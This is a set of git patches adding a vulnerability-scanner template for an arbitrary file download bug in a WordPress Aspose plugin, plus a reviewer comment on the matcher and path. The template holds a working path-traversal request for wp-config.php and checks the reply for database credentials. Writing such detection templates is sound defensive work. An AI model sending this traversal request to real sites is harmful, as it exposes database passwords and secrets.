From 3400cfff5e6707b4030b022968e39971a53aa5dc Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 22 Oct 2021 08:41:10 +0900
Subject: [PATCH 1/2] Create aspose-importer-exporter-file-download.yaml
---
 aspose-importer-exporter-file-download.yaml | 29 +++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 aspose-importer-exporter-file-download.yaml
diff --git a/aspose-importer-exporter-file-download.yaml b/aspose-importer-exporter-file-download.yaml
new file mode 100644
index 0000000000..0216e21bf1
--- /dev/null
+++ b/aspose-importer-exporter-file-download.yaml
@@ -0,0 +1,29 @@
+id: aspose-importer-exporter-file-download
+
+info:
+ name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
+ author: 0x_Akoko
+ severity: high
+ description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+ reference:
+ - https://packetstormsecurity.com/files/131162/
+ - https://wordpress.org/plugins/aspose-importer-exporter
+ tags: wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
From 82ca4a8c4384c7e3d3264b433a1a64606f21feab Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Fri, 22 Oct 2021 15:59:44 +0530
Subject: [PATCH 2/2] Update and rename aspose-file-download.yaml to aspose-ie-file-download.yaml
---
 .../wordpress/aspose-ie-file-download.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename aspose-importer-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-ie-file-download.yaml (90%)
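Review bot: The `path:` entry in the new template requests `aspose_import_export_download?file=` with no file extension on the script name, which looks incomplete for a plugin endpoint. Please confirm it against the Packet Storm reference, because a path that never resolves makes the template report affected sites as clean. The word matcher also passes on any 200 body that merely mentions `DB_NAME` and `DB_PASSWORD`, so anchoring on the PHP constant definition would be stricter, for example a `type: regex` matcher with `- "define\\(\\s*['\"]DB_PASSWORD['\"]"`. The `description` could also state the impact, namely that disclosure of `wp-config.php` exposes database credentials and auth salts, so whoever triages a hit knows these need rotating.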
diff --git a/aspose-importer-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml similarity index 90% rename from aspose-importer-exporter-file-download.yaml rename to vulnerabilities/wordpress/aspose-ie-file-download.yaml index 0216e21bf1..095211f5e4 100644 --- a/aspose-importer-exporter-file-download.yaml +++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml @@ -1,4 +1,4 @@ -id: aspose-importer-exporter-file-download +id: aspose-ie-file-download info: name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download @@ -8,7 +8,7 @@ info: reference: - https://packetstormsecurity.com/files/131162/ - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi + tags: wordpress,wp-plugin,lfi,aspose requests: - method: GET